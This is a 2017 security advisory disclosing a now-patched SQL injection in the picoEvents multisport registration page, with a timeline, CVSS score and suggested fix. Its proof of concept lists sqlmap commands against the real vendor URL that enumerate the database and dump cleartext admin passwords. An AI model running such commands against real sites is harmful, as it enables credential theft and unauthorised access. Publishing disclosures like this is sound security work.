entry.picotiming.ch - SQL-Injection Vulnerability (#mvid6)

Document Title:
===============
entry.picotiming.ch - SQL-Injection Vulnerability


mosi Vulnerability ID (mvid):
===============
6


Discovery Status:
=============
Patched - Public Disclosure


CVSSv2 Overall Score:
===============
9.6


CVSSv2 Vector:
==============
(AV:N/AC:M/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C/CDP:MH/TD:H/CR:M/IR:M/AR:H)
https://nvd.nist.gov/vuln-metrics/cvss/v2-calculator?vector=(AV:N/AC:M/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C/CDP:MH/TD:H/CR:M/IR:M/AR:H)


Product & Service Introduction:
==============
picoSoft provides with picoTiming a software for timekeeping of orienteering events combined with SPORTident. To simplify the registration for a course, the manufacturer provides an online registration branded picoEvents.
http://www.picosoft.ch/indextiming.html


Abstract:
==============
Simon Monai found together with Timo Kübler and Namo Flury a SQL-injection vulnerability in the web form. It was abused to delete the competitions stored in the database on the webserver.


Report Timeline:
==============
2017-06-19: Analysis of server attack requested by vendor
2017-06-19: Vulnerability detected
2017-06-19: Vendor informed
2017-06-20: Vendor acknowledge
2017-06-20: Vendor applied workaround
2017-06-21: Patch provided by mosi security research
2017-06-21: Patch faulty
2017-06-26: New patch by mosi security research
2017-06-26: Patch approved by mosi security research
2017-06-27: Public Disclosure


Affected Products:
=============
entry.picotiming.ch - Multisport Registration Page


Exploitation Technique:
=============
SQL Injection


Security Level:
=============
Critical

Technical Details & Description:
=============
Request method (s):
[+] GET

Vulnerable Module(s):
[+] http://www.picoevents.ch/entry/multisport/weiche_msp.php?recordID=95


Proof of Concept (PoC):
=============
By running following commands in the shell of a Kali Linux installation, the administration account passwords can be gathered:

sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 --dbs
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS --tables
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS -T admin --columns
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS -T admin --dump

The results are alarming. The admin passwords are stored in clear text and allow the hacker to log into the administrator interface and perform changes.


Possible Solution:
============
Check the GET-vars against SQL injection parameters and hash the passwords. A WAF can help preventing further attacks.


Security Risk:
============
This vulnerability is rated critical and was already abused. (CVSSv2 9.6)


Author / Credits:
============
mosi security research - Simon Monai (http://jongliertricks.ch/kontakt)


Public Disclosure:
============
2017-06-27 - https://jongliertricks.ch/mosi-security-research/40


----------------------------
https://jongliertricks.ch/mosi-security-research